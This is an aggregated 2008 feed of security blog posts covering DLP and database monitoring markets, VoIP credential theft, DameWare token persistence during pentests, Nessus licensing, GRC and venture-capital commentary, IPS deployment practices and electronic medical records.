Thursday, May 15, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

New kid on the DLP block [IT Security: The view from here]

Posted: 15 May 2008 07:18 AM CDT

When I was at InfoSec, my friend and Ingrian predecessor Norberto Costa, now at RSA, asked me if I'd seen Orchestria. I immediately got a mental picture of their stand at RSA2008, and realised that that was all I knew of them.

"Yes, they were at RSA," I said helpfully. When I got home I looked up their site and saw that they had an international presence, but an R&D centre in Taunton. For those of you not familiar with UK geography or anthropology, Taunton is in Somerset, on the west coast of the UK, which is not quite as cosmopolitan at the west coast of the US. Somerset is famed for its cider, cheese (Cheddar is in Somerset) and holes (Wookey Hole is a cave, near Cheddar), not its technology.

I dropped them an email, explaining my fondness of all things west country and my desire to speak to them, and managed to get a half hour on the phone to the CTO yesterday. I was most disappointed to find that he did not speak about combine harvesters with a Somerset burr. In fact he was very obviously a professional business man, as proven by his opening gambit.

"I was a technical specialist at Benchmark Capital, who invested in Google amongst others."

Benchmark paid for him to set up Orchestria, with proper funding, a proper team, and some real experience. This was in 2001, and I hadn't heard anything about them until last month. Since then I have been asked about them a number of times. For someone who pretends to be familiar with the data security space, this was slightly embarrassing. Not any more though.

"Orchestria was set up as a compliance tool, and was sold as such into very large companies for the last 5-6 years."

It was only the DLP bandwagon coming along which made them realise that they had something which could do that and a whole load more. If they are to be believed, Orchestria are beating the likes of Vontu in accounts where they appear together. I fully expect a mail from Kevin to explain why this is untrue, and will print it here in the interests of fair play. If this is the case, it is little wonder they have been so hyped recently.

Digging a little deeper into the technical side, Orchestria uses a natural language engine, hundreds of times faster than regex and other methods used in current DLP. They have 26 agents, covering every possible exit point on the network, on every popular platform. They cover email protection, which few of the others manage to do well. It all sounds very impressive.

I have yet to see proof, and I'm sure to get a barrage of emails from my other DLP contacts saying why theirs is better. In fact I hope I do, this is exciting stuff.

There you go Norberto, I asked.

VoIP and identity fraud on the BBC [SIPVicious]

Posted: 15 May 2008 05:06 AM CDT

The BBC News is running an article highlighting one of the most basic vulnerabilities in the majority of current VoIP providers - the lack of encryption. Indeed, this is a problem since SIP passes an md5 hash of the password as clear text and therefore anyone watching the traffic can perform an offline attack and quickly recover the credentials. The attack has been described in countless blogs, articles and papers by now and some tools are very efficient in demonstrating this issue.

What caught my eye is the mention of VoIP credentials being sold on the underground 17$ a piece. So I emailed Mr Gladwin who was quoted in the article. This is a summary of our email conversations:
  • There is no indication that stolen VoIP details were harvested because of the lack of encryption
  • If anyone comes across underground forums / sites / resources which have prices please let me know. Unfortunately Dave Gladwin was not able to provide me with a reference (until now)
  • There was no indication as to the size or volume of the VoIP credentials trading
Skype took the chance to remind us that this is not an issue for then (since they make use of a proprietary protocol which has encryption built-in).

I'm interested in learning which method is being used to steal credentials. Take your pick:
  • Sniffing at WiFi internet cafe's / hacked service providers etc and offline password attacks
  • Active password attacks (such as those supported by SIPVicious svcrack). Such attacks have been previously used by Robert Moore and obviously others which were not caught ;-)
  • Hacked VoIP service providers or end users
  • Phishing attacks
My feeling is that active password attacks will give you the best results when the target is simply "the Internet". But in the end, what matters is what's being currently abused and how we can prevent and mitigate.

Links for 2008-05-14 [del.icio.us] [Anton Chuvakin Blog - "Security Warrior"]

Posted: 15 May 2008 12:00 AM CDT

Token Passing with Incognito Part 3 [Carnal0wnage Blog]

Posted: 14 May 2008 11:32 PM CDT

Sorry no screen shots, i didnt think anyone would care that much but I have been able to confirm in my testing (dameware 6) that if you are using dameware in your enterprise for remote management/admin you are leaving tokens laying around on the remote boxes.

Because dameware just gives you a screen on the remote host and you still have to log in, the token lingers until you reboot.

Good to know if you are auditing an organization that uses dameware. Like most things, the real protection is to ensure the auditor/attacker cant get on the box in the first place and for client side attacks that the privilege to leverage the token passing tool is not allowed on user accounts (even admin accounts unless its needed). This is configurable in group policy.

still to-do, Terminal Services and RDP

Val Smith tells it like it is [Carnal0wnage Blog]

Posted: 14 May 2008 11:23 PM CDT

God Bless Val Smith for laying it out there.

http://seclists.org/dailydave/2008/q2/0055.html

"I'm in it for the fun.

There I said it. If everyone did everything securely, I wouldn't have
much to do and I'd have to pour coffees or flip burgers for a living.
I like showing up for a pen test and finding unpatched boxes, or users
sharing admin passwords. I love finding web apps with null byte file
inclusion bugs, or passwordless ssh keys with sudo permissions on
every server. Its FUN. I suspect other security researchers have
reached this conclusion (even if they haven't admitted it to
themselves yet) that security is probably too hard a problem to
"solve" and all our ranting really doesn't make anyone more secure in
the long run. At this point, broken things are fun and we just want to
play and thankfully people are willing to pay for it. I don't mind if
you continuously make it just a little bit harder, just to keep it
interesting, but don't take away my exploits please! ;) "

Changes to Nessus License Model [Carnal0wnage Blog]

Posted: 14 May 2008 11:20 PM CDT

Nessus has changed their license model to essentially do away with the free version for anyone who scans networks (yeah yeah there are exceptions). I wont get into the greedy or not, like Martin McKeay said "Tenable made a business decision that they need to collect revenue on their plugin feeds in order to continue providing the level of support they have always given. Some people are going to complain that Tenable is getting greedy; I'd counter that they just want to get paid for the work they've been supplying to the community for years."

For the most part i agree with that, and i what is a smart decision by Tenable to look around and see that other VA scanners that are comparable cost more so they "might as well" charge too. But i do have to admit that since there is no good tool that "does it all" it is getting mighty annoying to pay for multiple tools to get a job done.

A new fully open source VA scanner like nessus used to be is a long time coming, but i don't think anyone will step up to bat. The only reason to do it would be to make money and why go up against nessus?

But if anyone IS taking requests... a VA scanner that i can select specific checks without running all the crap that runs for nessus would be nice or checks that require all the nessus libraries. a little command line jobby that you throw it an iprange and a check and it does the rest would be more than handy.

Is Virtual Security Technology A Prime Target For Acquisition? [Security In The Virtual World]

Posted: 14 May 2008 11:14 PM CDT

This week has been an interesting week in the virtual security blog world!  Simon Crosby of Citrix/XenSource stated in his podcast that he felt the virtualization vendors like VMWare and Citrix didn't have the competence to address the security challenges of virtualization and Chris Hoff blogged about it saying that the statement is a cop-out and that they should do more in securing their platforms. Alan Shimel also blogged on the topic and agreed with Hoff and I blogged about it agreeing with both Simon and Hoff. 

To restate my position on it; I think that Simon is correct in that virtualization vendors like VMWare and Citrix do not have the expertise today to address all of the security challenges.  I also agree with Hoff that they should address more of the security challenges.  So this leads me to my own opinion that some of the virtualization vendors will acquire security technologies to differentiate  themselves from others and acquire the expertise.  Many say that the virtualization market will become commoditized and  that security can help protect its value. 

Think about it.  Would you rather buy a Virtual Environment or a Secure Virtual Environment?!

So.. Onto the topic of this blog!  Is Virtual Security Technology A Prime Target For Acquisition?

I'd love your opinion so please comment!!

What triggered my blog on this topic was this rumor I heard today.  Some buzz started today that one of the virtual security startups just agreed behind closed doors to be acquired by one of the big guys.  But, who could it be?  Reflex Security, Catbird, Blue Lane, Altor Networks, VMSight, Embotics, etc.

I have an idea of who it could be but don't want to spread rumors that could be false.  The other question is whether or not there is an atmosphere of acquisition frenzy brewing in the virtualization market. 

Please comment on your thoughts - Just click the comments link bellow.

107.4 WDNS…All requests, no replies [BumpInTheWire.com]

Posted: 14 May 2008 10:47 PM CDT

El Sidekick, and perhaps TB, read the title to this post and chuckled.  The title stems from a simple configuration oversight.  Three times over.

As I write this the air seems a little more pure, the sun a little brighter and the grass a little greener.  This game we play isn’t a Mike Tyson (in his prime) title bout that lasts 47 seconds.  A lot of times it turns into a 12 round slugfest that goes to the judges.  The DHCP problem that I’ve written about here, here, here and here came back with a vengence last week and has been happening every day since.  We opened a ticket with Cisco thinking it was a switch configuration problem.  I ran a dozen different inquiries by a local Cisco SE trying to solve this problem.  The support ticket resulted in a “the switches are configured correctly.”  That didn’t help solve the problem.  Cisco support said that the next step would be to get some network traces to see where the traffic was not getting through.  We did these traces when this problem first appeared in January.  For whatever reason after I did them and analyzed the trace I thought that I had bad data.  I’ve slept and drank since then and can’t remember why I thought the data was bad.  That’s neither here nor there right now.  Yesterday we did get a known good trace that told the story.  The DHCP request was leaving the access port, was being seen at the uplink port on the edge switch but was NOT being seen on the uplink port of the core switch.  That narrowed it down to three things:  Either the edge switch was not transmitting the DHCP request, our LANenforcer 2024 was dropping or blocking the traffic, or the uplink port on the core switch was not receiving the DHCP request.  Now I’m no networking expert but the likely hood of the uplink ports not transmitting or receiving the DHCP traffic seemed highly unlikely to me.  When this problem appeared today I started focusing on the LANenforcer 2024.  I noticed that the port where all of these DHCP problems were originating from had just shy of 100 more users logged on through it than the next highest utilized port.  It had 257 users logged in to be exact (remember this number for later).  In a snap decision we decided to move a 48 port switch that was part of a “daisy chain” off of a bigger switch to another switch on a different port pair on the LANenforcer 2024.  All of a sudden the 10 or 12 users that could not connect all morning connected immediately.  Perhaps we had passed a threshold for a single port pair we didn’t know about.  Hell I didn’t know.  I was a desparate man grasping at straws.  From day two or three of this problem we figured it was “load” related as the problem always showed up about 9:00 AM after the last of our users logged in.  After seeing the number of logged on users on this particular port pair being substantially higher than the others I fired off an email to Nevis Networks’ technical support.  My good man Quentin called me late this afternoon on a fact finding mission and out from the clouds the sun began to shine.  While talking to Quentin and describing the problem I could see (or hear) a lightbulb go off above his head.  Much to my shagrin the LANenforcer 2024 has a setting for “Max Allowed MACs” for a port pair.  The default value for this is 256.  Obviously the LANenforcer 2024 was doing exactly what it was supposed to do and was limiting the number of MACs through any single port at 256.  Some days we would hit this limit, most days we would not.  Much like ol’ Nessie the problem would disappear as soon as it arrived.  I am confident now saying this DHCP problem is behind us.

In celebration I cooked up a great meal tonight.  A steak, some cream cheese bacon wrapped jalepenos along with some Miller Lite.  The hours of thought, research, digging, hunting, searching and lamenting over this problem the last 6 months merits such a feast.  The relevant thing is this little blog of mine, which is really just an online diary, provided some much need answers to questions about timelines of this problem the last two days.  The search feature on this site is much faster than the search of my inbox! 

Rich Mogull does his best Stiennon imitation, says GRC is dead [StillSecure, After All These Years]

Posted: 14 May 2008 10:12 PM CDT

Iceberg Some of the Stiennon "magic" must have rubbed off on Rich Mogull when they were both at Gartner or maybe in a case of the imitation being the sincerest form of flattery, Rich M secretly admires Richard S. In any event taking a page out of the "xxxx is dead" playbook, Rich writes that GRC is dead. In fact Rich says it was stillborn and never really alive. There are many things that Rich says in his article as well as Gunnar Peterson's article that he references, that I agree completely with. However, overall I think Rich's fatal mistake is one of Titanic proportions. He is mistaking the tip of the iceberg for the entire mountain of ice that is under the water and not as easily seen. The reports and dashboards of GRC products represent the by product of much of the real work and value they bring not just to the "C" level but to the security practitioner who is tasked with ensuring compliance as well. I am seeing the compliance workload fall on the already over worked, underpaid security guy time and time again and they need help with it!

I know people like Mike Rothman say compliance is bull and if you just follow good security practices, compliance takes care of itself. However, lets be real folks, between PCI, SOX, FISMA, etc., compliance is driving budget in the security industry. In an industry where the "security guy" just did not have the tools to push through budget for the resources required, compliance has become the sledgehammer that the CISO and other security types use to crash through the doors into the CFO's office and get the budget required.

Before I delve further into why I disagree with Rich though, let me state where I do agree with him and Gunnar for that matter. I do agree that a by-product of compliance has been a move towards running your business as "audit-driven rather than business-driven". Somewhere along the line we have forgotten that the rules, regulations and statutes that compliance is driven by were put in place to provide a minimum of acceptable security and confidentiality to protect sensitive information. It was supposed to be about protecting the data, not about checking off the compliance box! I agree with Rich that it has become a way into the C-level office. But what is so bad about that? Symantec has been selling their security into the CFO for years. Rich not having worked at a vendor, I don't know if you realize how hard it is for the security folks to get budget approval for the tools they know they need. In order for security to get its fair share of the budget pie, it is imperative that security budget decisions are made at the C-level. If the security team can't get the approval, the security vendor is going to try and help.

While dashboards and reports are the tip of the iceberg and the shiny baubles that are used by the GRC vendors to get the attention at the C-level, I think that the bulk of the work takes place below the water. It is making sure that in fact the enterprise is in compliance. Making sure that everyone has the latest patch level, has AV installed and that data is protected from leakage is the real work. Testing and ensuring this is the real job of GRC, the reports and dashboard is just the way you can show it working. Rich I think you are the one being short sighted if you think these products are just about the reports. Without actually doing the analysis and investigation the reports are meaningless. In my mind is much like SIM reports. Without actionability and correlation, how much value are the SIM reports?

GRC is a needed tool in todays security practitioners tool kit. They are being placed in the position to ensure compliance and they need the ability to do so. They also need help getting the budget approved for the tools they need to do the job. We can rant all we want about compliance for compliance sake being asinine, but the fact is that is the world we live in right now and rather than spitting into the wind, lets figure out how to make it work best for us.

Electronic Medical Records: Friend or Foe? [The Security Catalyst]

Posted: 14 May 2008 09:37 PM CDT

By Patrick Romero

In 2004, President Bush set a goal that by 2014 most Americans would be using an Electronic Medical Record (EMR). In his vision, doctors would be using EMR systems with interoperable standards that would allow them to share lab results, images, computerized orders and prescription information with hospitals and other health facilities.

The Office of the National Coordinator for Health Information Technology was created by President Bush to guide the work on EMR standards and coordinate public and private efforts. Its job is to define minimally functional systems as those on which doctors can record and manage progress notes, order tests, record test results and electronically prescribe medications.

The reasons for the insufficient progress are many, according to the report, “Gauging the Progress of the National Health Information Technology Initiative.” They include slow adoption of EMRs by physician practices, the impractical nature of a national health information network, the difficulty of creating interoperability standards and Congress’ failure to pass legislation addressing health IT roadblocks.

A 2005 survey estimated that only 13 percent of solo practitioners and 16 percent of groups with 2–4 physicians have adopted EMRs, compared to 29 percent of groups with 10–19 physicians and 39 percent of groups with 20 or more physicians. The office, created by Bush to guide the work on EMR standards and coordinate public and private efforts, defines minimally functional systems as those on which doctors can record and manage progress notes, order tests, record test results and electronically prescribe medications.

Slightly more than a quarter of practices with 11 or more physicians — a situation that describes only 8% of doctors — used comprehensive EMRs in 2006, according to an October 2007 Centers for Disease Control and Prevention report based the National Ambulatory Medical Care Survey. Solo or single partner practices — which account for almost half of all doctors — reported much lower levels of comprehensive EMR use: 7.1% of solo practitioners, 9.7% of those with a partner.

Another reason for slow progress on EMR adoption is that a national health information network is impractical, said experts in the California foundation report. The system is intended to be a “network of networks” linking state, regional and other health information exchanges so they can share information.

According to the eHealth Initiative Foundation (eHI), 28 states have initiated Health Information Technology (HIT) planning and an additional seven states have progressed to the implementation stage.

Privacy Concerns

The Medicare Electronic Medication and Safety Protection Act (S 2408), sponsored by Sen. John Kerry, would require physicians to use e-prescribing for Medicare patients or face a 10% cut in payments. The bill is pending in the Senate Finance Committee.

Deborah Peel, head of the Coalition for Patient Privacy, said an e-prescribing bill would be an excellent opportunity to prohibit data mining.

Privacy advocates are concerned that the bill should come with more privacy protection. They would like to require that any prescription data transmitted electronically be used for the express purpose of prescription filling and submitting the necessary codes to the insurer for payment. Other provisions being sought are annual reports to patients listing everyone who accessed their data and mandated security breach notifications.

While EMRs are not a panacea to fixing our national medical system, they do offer more than traditional modes of storing information. The government should continue to encourage doctors toimplement EMRs in their practice through substantial grants and subsidization. There are currently such programs but more needs to be done to publicize them. While a mandate might eventually be necessary, there are less restrictive alternatives currently available. Nevertheless, it is time that the medical community catch up with other sectors of our economy that have embraced the use of digital information.

This posting includes an audio/video/photo media file: Download Now

May 2008 Security Round Table | RSA - Going Beyond the Hype [The Security Catalyst]

Posted: 14 May 2008 06:58 PM CDT

I had a great time at RSA 2008 this year, but didn’t attend any keynotes and only saw some snippets of sessions. Yet I took several *quality* briefings during the course of the week — and will be interviewing, profiling and sharing my impressions over the coming months. I started the week a bit sad — after walking the show floor, it felt to me that the industry was, en masse, running in entirely the wrong direction. I ended the week not only with renewed hope, but with new and powerful insights.

RSA carries a lot of hype. Now that the conference is over, Martin and I wanted to go beyond the hype and invited a panel with mixed experience to share with us their impressions, opinions and lessons learned. During this SRT, we cover the role of bloggers as media, the *real* value of RSA and a whole bunch of other interesting issues and perspectives.

I also share, near the end, what I thought the theme should have been. Thinking about it now, it is a good choice for next year, or even for a SCC conference!

This marks the return of the SRT. We already have the June SRT recorded — a great show with the Jericho Forum, dispelling a lot of myths and providing some good insight into how they are helping to drive change in the industry. In July we’ll tackle the issue of using botnets to fight botnets and August will revisit a topic raised during the May SRT — the responsibility of security bloggers and the role of new media.

Happy Listening.

 

 

This posting includes an audio/video/photo media file: Download Now

Another Old Presentation: Security Metrics [Anton Chuvakin Blog - "Security Warrior"]

Posted: 14 May 2008 06:24 PM CDT

Another oldie, but ... well, maybe not goldie: my 2005 presentation on security metrics.

Network Security Podcast, Episode 104 [securosis.com]

Posted: 14 May 2008 05:18 PM CDT

Martin and I were all over the map this week, but still managed to keep things under 30 minutes. We talk about the Dave and Buster’s hack, data exposure in Chile, and browser virtualization, among other things. The show is up over at netsecpodcast.com.

New Nessus Licensing: NSP Interview With Ron Gula, CEO Of Tenable [securosis.com]

Posted: 14 May 2008 05:13 PM CDT

If you didn’t catch the news today, Tenable is changing the Nessus license and enabling the real-time signature/plugin feed for the free version. Martin and I managed to snag Ron Gula for a short interview we posted over at NetSecPodcast.com.

Overall I think it’s a very positive license change and it shouldn’t hurt you unless you were using the free version for commercial purposes.

New video podcast posted [Got the NAC]

Posted: 14 May 2008 05:05 PM CDT

Tawnee Kendall and I sat down and recorded this video on Interop 2008. Check it out!




Tags: ,

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

GRC, Average Deal Size, And The Dangers Of Venture Capital [securosis.com]

Posted: 14 May 2008 04:42 PM CDT

Hot on the heels of my GRC is Dead post, an associate sent me a private rant on a past experience where the investors drove his company down a similar rathole.

Here’s the thing, kids; venture capitalists aren’t there to help you build a long-term business. Their entire goal is to achieve specific returns in specific time periods by driving your company into an exit (IPO or sale). You become a slave to your investors, many of whom aren’t as business savvy as you might think, and most of whom don’t understand your particular market.

My friend is allowing me to post this since he can’t. Keep in mind that some of the biggest “GRC” pushers out there are large companies without VCs (Oracle, SAP, IBM), which thus are running under different dynamics.

The Three Magic Words (or: Why GRC won’t die until the companies do)

I read Mogull’s post on GRC yesterday, and I found myself nodding in agreement with all of it. The basic thrust of the article:

“GRC is now code for "selling stuff to the C-level". It has little to do with real governance, risk, and compliance; and everything to do with selling under-performing products at inflated prices. When a vendor says "GRC" they are saying, "here's our product to finally get us into the Board Room and the CEO's office". The problem is, there isn't a market for GRC.”

This is exactly what GRC is about. But why? Why would our vendor community spend all of their time trying so hard to get into the Board Room and the CEO’s office when there’s an entire market out there of businesses to whom we could sell products? Statistics say that 99% of businesses in the USA have less than 1000 employees: that’s a HUGE market for security software and services that are reasonably priced and deliver value. Why are there almost no vendors looking to that market? And why are many of the ones who do (e.g., UTM vendors) mocked and ridiculed?

Three magical words: “Average Deal Size”.

I learned these magic words when I was a relative newbie in information security, working for a vulnerability management vendor whose aim it was to sell appliances into all parts of the enterprise. They believed that vulnerability management was the kind of tool that needed to be embedded into every subnet within the entire organization, and that a huge infrastructure would be built up to manage vulnerabilities. When looking at who they wanted to be when they grew up, the names that were mentioned were SAP and PeopleSoft. That the CEO should have vulnerability reports on his desk every week. And that the CEO should be reporting vulnerability metrics to the Board at the quarterly meeting. (No, I’m not exaggerating. This is what they believed.)

Unfortunately, no customer seemed to care that much about vulnerabilities. Even in the FUD-laden heyday of worms and viruses (Slammer, Blaster and Nimda, Oh My!), nobody wanted to drop vulnerability management tools on every subnet and embed vulnerability management deep into their business process. It was added cost without incremental benefit. And no CEO really cared about seeing the reports. Most CISOs didn’t even want to see the reports.

At the same time, another company was eating our lunch by offering to scan from the outside, on the web. They were basically giving the service away, selling little scans at $5K for anybody who wanted them. And they were rolling in cash compared to us. So, being the go-getter that I was, I put together a plan to create a competitive business within our company. Even with ridiculously conservative estimates, we were going to double revenue within a year (because it’s not hard to double an infinitesimally small number).

And I took it to senior management, who summarily rejected it. I didn’t understand, and I fought hard, but their answer was firm: “No way.”

I was confused and dejected. This seemed stupid - it didn’t make any business sense. The VP of sales saw this and took me aside after the meeting. He explained it to me, and it was the first time I had heard the three magic words. He would open my eyes to one of the things that makes startups do things that appear absolutely idiotic.

He explained that the reason they wouldn’t compete with the other vendor was that it would lower our “average deal size”. That they would rather have a single $100K deal than 100 $2K deals, even if it was only half of the revenue.

It didn’t make sense to me (it still doesn’t), so I asked him why.

“Because that’s one of the big things that venture capitalists care about when they’re valuing your company”, he said. “And our board is made up of our venture capitalists.” The lights went on at that moment.

Fast forward to today. The push toward GRC isn’t because it makes business sense for any of the vendors (i.e., will increase revenue or reduce costs), but entirely because the vendors in the space are worshipping the gods of VC-driven boards who are using average deal size as the metric. It’s why you see companies that are making good progress in mid-market or the mid-range of the small enterprise suddenly declare that their target is the C-level of the “Global 2000″ companies.

The problem with this is that most 100-person companies are entirely ill-suited to live in that environment. Large enterprises demand (to use Moore’s term) the “whole product”. A full support staff, complementary products, training, and serious hand-holding resources that a 100-person, $10M company just doesn’t have. And, having worked in startups for the majority of the last 10 years, I can say that it kills more than it benefits. The burdens of supporting large, enterprise customers are burdens that, for the most part, only large, enterprise vendors are built to support.

It always surprises me when a successful company (e.g., a small consulting company) that is ideally suited to selling, marketing and positively pwning the mid-market and mid-level sales decides to turn up-market (and become a “GRC company”) to compete against companies that are built for that environment (e.g., E&Y, Accenture, IBM Global Services, etc.). Rather than taking the market that they have built themselves up to succeed at, they enter a market that they’re entirely ill-suited for, and go through multiple VPs of sales and marketing wondering why their pipeline is weak.

But the three magic words are powerful. They blind men and women to smart business decisions (mostly because they are used at board meetings). And they create companies that are willing to give anything to end up at the top end of the market, even if they have to make up acronyms (GRC) and sacrifice all actual measures of business success to get there.

Social Media Release: Crutch for the Weak? [Mediaphyter]

Posted: 14 May 2008 02:20 PM CDT


I’ve been speaking up on Twitter about my concerns around Social Media Releases (SMRs). I’ve apparently been flapping my gums enough to get the attention of PR Newswire, a representative of which called me yesterday to find out why I’ve been so negative. I know that social media expands far beyond marketing but in this blog I’m focusing on my concerns with SMRs further enabling sub-par PR skills.

Over at Social Media Release, Chris Heuer gives a quick overview of the purported magic of the SMR:

“The Social Media Release is intended to make it easier on people to identify and share the most important pieces of information with others around the globe while adding their own valuable perspective and/or editorial. It also takes full advantage of HTML, multimedia and the network effects enabled by the Internet by using structured data via the Microformat, which ultimately increases its findability by interested parties - which is ultimately the driving purpose of public relations and the press release specifically.”

Let’s hone in on the implication that ruffles my former PR girl feathers the most: Increasing the findability of press releases is the ultimate purpose of PR. I could’ve sworn the ultimate driving purpose of PR was to fuel company visibility and credibility with support of third-party validation, which in turn drives revenue.

Press releases, SMRs or otherwise, are sales tools and information vehicles for customers, partners and shareholders. They are not a primary driver for bringing news to the media and achieving balanced coverage. If an SMR is discovered out on the Web, even if it includes comments from third-party sources or trackbacks to blogs that support it, it is still covered in marketing slime. Can it really be any more of a trusted resource than a regular old press release?

Heuer, Jeremy Pepper, Shel Holtz and Todd Defren (the credited developer of the first SMR) had a large Twitter discussion a while back on where the SMR fits in the PR landscape. I agreed most strongly with Pepper on what is also my biggest concern: there is no substitute for good relationship building and written communications. I don’t care if the medium is an SMR or an email or a carrier pigeon or some futuristic Jetson-esque device. What helps drive good news is a) solid content and b) trusted relationships and there is no “tool” that replaces it — my friend and well-known tech journalist Ryan Naraine agrees. He’s said before that he does not care how the news is delivered, just give him good content and don’t waste his time.

The proponents of the SMR say that they never intended it to be a replacement for good PR skills and I trust them on that one. These are seasoned guys. I worry more about the less-than-stellar or junior PR folks using it as yet another cop-out for poor writing or lackluster communication skills. And if their perception might be that the sole objective of PR is to increase “findability” of marketing collateral, we’ve got problems.

Less dangerous to me is the social media newsroom, which I believe was also fathered by SHIFT Communications. I tend to like the simple and clean approach that Fathom SEO is using (the company recently released a WordPress template for such). The social media newsroom seems to accomplish what I think most companies who have a broad blogosphere presence would want, from linking to multimedia and social networking pages to integrating commentary. But if you have a fully functional social media newsroom, and a handle on truly top notch PR strategy, do you need the SMR?

In the end, regardless of what I blather here, I’m still trying to find the answer to one simple question: “Does anyone have any metrics to suggest the proven success of an SMR in *any* arena?” Especially considering their cost. I’ve asked this on Twitter on and off for about a month now and no one has yet to provide a case study.

Can you?

Interesting Information Security Bits for May 14th, 2008 [Infosec Ramblings]

Posted: 14 May 2008 02:06 PM CDT


Hi folks. Good afternoon. Here are a few things to look at today.

There is a post on the nCircle blog about some interesting issues regarding some IPv6 issues we need to be aware of.

Sam Ryder has an interesting post up on alert blogic about SaaS and its impact on the channel.

The May issue of “IT Compliance in Realtime” is available from Rebecca. Go here for a teaser :)

Frank Cassano has a post up at bloginfosec about building out a framework to structure your information security program around. I have only skimmed it so far, but looks interesting.

As other have noted, there does not appear to be a fee (that’s a link to a pdf) any longer for real-time vulnerability updates for Nessus any longer for home and non-commercial users.

Have great rest of your day!

Kevin

Database Activity Monitoring Is As Big As, Or Bigger Than, DLP [securosis.com]

Posted: 14 May 2008 12:12 PM CDT

Last night I had this recurring dream I seem to have a few times a year. It involves a plane crash, but not one that I’m on. The dream always changes, but in every case I’m out and about someplace, I look up and see a struggling plane, it crashes, and I rush over to help. The dream almost always end before I do anything, and since I’m no longer a field medic portions of it usually involve me figuring out how I can help. Must be my overblown, currently unused hero complex or something. Never doubt the bounds of my ego.

This has absolutely nothing to do with what I want to talk about today; I just think it’s weird.

I swear I posted on this before, but I can’t find it anywhere. During a dinner with one of the Database Activity Monitoring vendors (the best DAM name in the industry) I mentioned their market size was equal to, or slightly larger than, the pure-play DLP market (that’s where we toss out peripheral products that only use DLP as a feature). I assumed this was common knowledge, but their jaws dropped. We ran through some back of the envelope calculations, and placed DLP at about $70M in 2007, with DAM right in the same range. My estimates might be off by up to $20M, but that’s basically a rounding error when we’re talking total market revenues.

Here are a few caveats. My estimates don’t include a lot of peripheral vendors, and I slice down as best I can to estimate DLP vs. DAM specific sales. For example, Orchestria launched a new DLP product in 2007, but I only include a fraction of their revenue in the market rollup since most of the revenue is still coming from their compliance product. Same for Verdasys, Proofpoint, Imperva (also has web application firewalls), and other vendors either with multiple product lines, or where DLP or DAM is a feature of something else. I work with most of the major DLP and DAM vendors, and while some share their revenues under NDA, some don’t, and these are mostly private companies. I’m also certain a couple of them are lying to me.

So there you have it. DLP is heavily hyped, but DAM is essentially the same size without as much hype. I believe this is because DAM, in some cases, directly addresses a compliance requirement, while DLP isn’t usually required (although can often really help).

Peach 2.1 Fuzzer BETA2 Released [Security-Protocols]

Posted: 14 May 2008 10:29 AM CDT

Michael Eddington has released Peach 2.1 Beta2 today. This release includes many bug fixes, features, improvements, and supersedes 2.0 as the recommended version to use. Some of the updates...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

MySpace wins $230 million anti-spam judgment [mxlab - all about anti virus and anti spam]

Posted: 14 May 2008 09:48 AM CDT


Sanford Wallace and his partner Walter Rines face a $230 million anti-spam judgment. The duo were found responsible for sending out phishing scams designed to harvest MySpace login credentials, prior to bombarding members with messages punting gambling and smut websites. As many as 730.000 spam messages, directing to gambling and smut websites, were sent to MySpace members since late 2006.

Links for 2008-05-13 [del.icio.us] [Anton Chuvakin Blog - "Security Warrior"]

Posted: 14 May 2008 12:00 AM CDT

IPS - is it soup yet? Mike Chapple says yes and no [StillSecure, After All These Years]

Posted: 13 May 2008 08:25 PM CDT

Ips_soupMike Chapple over at SearchSecurity has a good article up on whether IPS are mature enough for enterprises to deploy.  Some may say that Mike has been asleep at the wheel, because certainly there have been plenty of IPS appliances sold over the last 3 to 4 years. Mike comes to the same conclusion I did almost 2 years ago in this article. Namely that the selling and marketing of IPS has far outstripped the actual performance of these devices. As Chapple says, "While today's IPS devices can keep up with high-speed network connections and process rulebases more efficiently, I'm not sure that the technology itself has matured; in fact, it hasn't really changed much at all." 

Just as I said back then. people today are still using IPS as IDS. In spite of what Richard Stiennon said back in 2003, it is still the fact. Those that have ventured beyond pure IDS do so on a limited basis. Mike lays out three best practices that most who are successful with IPS adopt:

  1. Run the IPS in "monitor" mode until it's clear that the system is properly tuned. We have been recommending this with our Strata Guard IDS/IPS for years. In fact we have a tuning wizard which gives you a real leg up in getting started with your tuning.  In essence though this means that you start off not blocking anything,and only after seeing what is really happening on your network do you selectively start enabling blocking of specific types of attacks.  You don't just turn on every rule to block.  This advice is similar to what our best practices in NAC recommends as well.
  2. Keep the number of "block" mode rules to a small, finely tuned set. Again this is something that has been the reasonable route for a while now.  Most IPS today runs in a hybrid IDS/IPS mode. Be selective in what you want to actually block verses what you just want to alert and/or log.  Too many rules set to block will lead to failure.  Being smart about which rules are set and grouping attacks to trigger a minimum amount of rules is key.  I have seen rule sets where one kind of attack can trigger multiple signatures.  This will fire more blocks than necessary and burden your system for no reason.  Don't overlap your rule sets if you are using Snort!
  3. Consider using a fail-open device. In line devices are a single point of failure. If your IPS does not offer some sort of bypass or other fail open device, you are asking for trouble.  Also, don't settle for the sales guy telling you the software or appliance is designed to fail open. In a power failure that isn't going to help. Make sure it is a self-powered bypass to be sure.

All in all it was a good validation for me to read this article. I think IPS is at a critical mass of adoption today, I just don't think it has reached a critical mass of utilization yet.  But progress is being made.

A Few Upcoming Presentations [Anton Chuvakin Blog - "Security Warrior"]

Posted: 13 May 2008 05:53 PM CDT

Just wanted to highlight a few of my upcoming presentations, live and web-based:

"Anton live:"
Webinars and webcasts:
Enjoy!

UPDATED: 5/13/2008

More On Non-lethal Weapons: Electrified Shieds [Anton Chuvakin Blog - "Security Warrior"]

Posted: 13 May 2008 05:25 PM CDT

Two quotes are enough, really:

"The kit "features a peel and stick perforated [f]ilm, power supply and necessary conversion equipment. This laminate becomes electrified providing a powerful deterrent to protect officers and keep suspects or rioters at bay." What could possibly go wrong?"

Love that last sentense...

and

"It's all part of the Office of Law Enforcement Technology Commercialization's Mock Prison Riot"

Wow, a prison riot, what a fun event! ;-)

Read here.

GRC is Dead [securosis.com]

Posted: 13 May 2008 03:26 PM CDT

I have to admit, I don’t really understand greedy desperation. Or desperate greed. For example, although I enjoy having a decent income, I don’t obsess about the big score. Someday I’d like a moderate score for a little extra financial security, but I’m not about to compromise my lifestyle or values to get it. As a business I know who my customers are and I make every effort to provide them with as much value as possible.

That’s why I don’t grok this whole GRC obsession (Governance, Risk, and Compliance) among certain sectors in the vendor community. It reeks of unnecessary desperation like the happily married drunk at the bar seething at all the fun of the singles partying around him. He’s got it good, but that’s not enough.

